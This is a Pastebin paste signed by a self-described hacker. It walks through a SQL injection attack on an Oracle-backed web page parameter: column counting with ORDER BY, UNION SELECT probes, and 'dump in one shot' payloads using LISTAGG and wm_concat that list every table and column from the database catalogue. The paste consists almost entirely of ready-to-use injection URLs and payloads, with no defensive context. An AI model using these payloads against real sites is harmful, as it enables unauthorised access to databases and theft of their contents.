zurael_sTz

Oracle SQL Injection and DIOS query

Feb 19th, 2017
510
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.76 KB | None | 0 0
  1. <===============Hacker zurael sTz===============>
  2. =================twitter=============================
  3. https://twitter.com/zurael_stz
  4. =================facebook============================
  5. https://www.facebook.com/sTzisrael/
  6. =====================================================
  7. =================telegram============================
  8. https://telegram.me/joinchat/BL8GnT_yQscC-6gBMuCW_w
  9. =====================================================
  10. <===============Hacker zurael sTz===============>
  11.  
  12. Oracle SQL Injection and DIOS query
  13.  
  14.  
  15.  
  16. http://www.site.it/pages.php?p=cut-linear') order by 3--&lang=it
  17. No Error
  18. http://www.site.it/pages.php?p=cut-linear') order by 4--&lang=it
  19. No Error
  20. http://www.site.it/pages.php?p=cut-linear') order by 5--&lang=it
  21. Error
  22.  
  23.  
  24. http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,NULL,NULL,NULL from dual--&lang=it
  25.  
  26. ctrl+u (view-source:)
  27.  
  28. view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select '1111',NULL,NULL,NULL from dual--&lang=it
  29. view-source:http://www.site.it/pages.php?p=cut-linear') Union All Select NULL,'1111',NULL,NULL from dual--&lang=it
  30.  
  31.  
  32. view-source:}
  33. <meta name="description" content="11111" />
  34. <meta name="description" content="1" />
  35. }
  36.  
  37. '">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--'
  38.  
  39. (select wm_concat('<li>'||table_name||':'||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120)||'<!--'
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46. http://www.site.it/pages.php?p=cut-linear') and 1=0 union select null,'">'||(select LISTAGG(table_name,'<li>') within group (ORDER BY table_name) from all_tables)||'<!--' ,NULL,NULL from dual --&lang=it
  47.  
  48.  
  49. (select banner from v$version where rownum=1)
Add Comment
Please, Sign In to add comment